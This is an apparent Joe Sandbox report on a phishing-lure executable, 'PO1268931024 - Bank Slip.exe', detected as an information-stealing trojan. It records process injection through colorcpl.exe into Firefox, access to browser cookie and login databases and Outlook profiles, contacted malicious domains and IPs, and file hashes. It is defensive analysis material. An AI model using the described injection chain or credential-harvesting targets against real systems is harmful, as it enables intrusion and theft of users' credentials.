                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Memory written: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: NULL target: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe protection: read write
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 2564
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Process created: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe "C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe"
                Source: C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
                Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: eiVHpMoiongmS.exe, 00000004.00000002.4157856825.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp, eiVHpMoiongmS.exe, 00000004.00000000.1885374031.0000000000DC0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Queries volume information: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe VolumeInformation
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\colorcpl.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\colorcpl.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.5930000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.PO1268931024 - Bank Slip.exe.414e790.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.1781279015.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.1770346968.0000000004139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                [MITRE ATT&CK matrix. Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
                [Behavior graph] Behavior Graph ID: 1539142, Sample: PO1268931024 - Bank Slip.exe, Startdate: 22/10/2024, Architecture: WINDOWS, Score: 100
                Process chain: PO1268931024 - Bank Slip.exe (started) -> PO1268931024 - Bank Slip.exe (started) -> eiVHpMoiongmS.exe (injected) -> colorcpl.exe (started) -> firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                PO1268931024 - Bank Slip.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                PO1268931024 - Bank Slip.exe | 100% | Avira | TR/AD.Swotter.eiavs |
                PO1268931024 - Bank Slip.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.rebel.tienda
                199.59.243.227
                truetrue
                  unknown
                  www.timizoasisey.shop
                  188.114.96.3
                  truetrue
                    unknown
                    xtelify.tech
                    84.32.84.32
                    truetrue
                      unknown
                      jexiz.shop
                      8.210.3.99
                      truetrue
                        unknown
                        7fh27o.vip
                        3.33.130.190
                        truetrue
                          unknown
                          prediksipreman.fyi
                          162.0.215.244
                          truetrue
                            unknown
                            www.ila.beauty
                            13.248.169.48
                            truetrue
                              unknown
                              www.givora.site
                              162.0.231.203
                              truetrue
                                unknown
                                www.college-help.info
                                38.88.82.56
                                truetrue
                                  unknown
                                  owinvip.net
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    ladylawher.org
                                    3.33.130.190
                                    truetrue
                                      unknown
                                      gucciqueen.shop
                                      178.79.184.196
                                      truetrue
                                        unknown
                                        www.meanttobebroken.org
                                        141.193.213.10
                                        truetrue
                                          unknown
                                          www.2925588.com
                                          103.71.154.12
                                          truetrue
                                            unknown
                                            wrl-llc.net
                                            3.33.130.190
                                            truetrue
                                              unknown
                                              www.prediksipreman.fyi
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.7fh27o.vip
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.ladylawher.org
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.wrl-llc.net
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.gucciqueen.shop
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.jexiz.shop
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          www.xtelify.tech
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            www.owinvip.net
                                                            unknown
                                                            unknownfalse
                                                              unknown
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539142
Start date and time: 2024-10-22 09:03:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO1268931024 - Bank Slip.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 120
• Number of non-executed functions: 323
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• VT rate limit hit for: PO1268931024 - Bank Slip.exe
Time | Type | Description
03:04:07 | API Interceptor | 1x Sleep call for process: PO1268931024 - Bank Slip.exe modified
03:05:06 | API Interceptor | 10698804x Sleep call for process: colorcpl.exe modified
                                                                                                      Process:C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1216
                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                      Malicious:true
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                      Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):114688
                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.93748742510879
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:PO1268931024 - Bank Slip.exe
                                                                                                      File size:762'880 bytes
                                                                                                      MD5:1fcde6f41117bdc978a69990608ecc69
                                                                                                      SHA1:e8724b7ed145e838303d0b1bb393c8f3545ad567
                                                                                                      SHA256:ee843bcf3bcd091101e9d641670be54dd9c3a2733ad3e248c29eb7e2a667c1d4
                                                                                                      SHA512:59ce09953d91e60ae0fb87ee3eb53e3488893103e790b5ce836b2f8a69ea69ad356f9f2615b105908c19c52b83f4a225b5bf589c6e30c6e68a617dcd912f5f11
                                                                                                      SSDEEP:12288:wBnkhMOoltiJO9kijsXfkaCWta49LvCdR2n+kMOslUkgNMk8Nae6TY:wBnkh5oDiJ/XfkaCt4v1y6GT6U
                                                                                                      TLSH:CFF4135032DC1F69DABE5BFA58F0906403FA94476491FB0D9DC321FB8A79B068A20F57
                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x4bb796
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
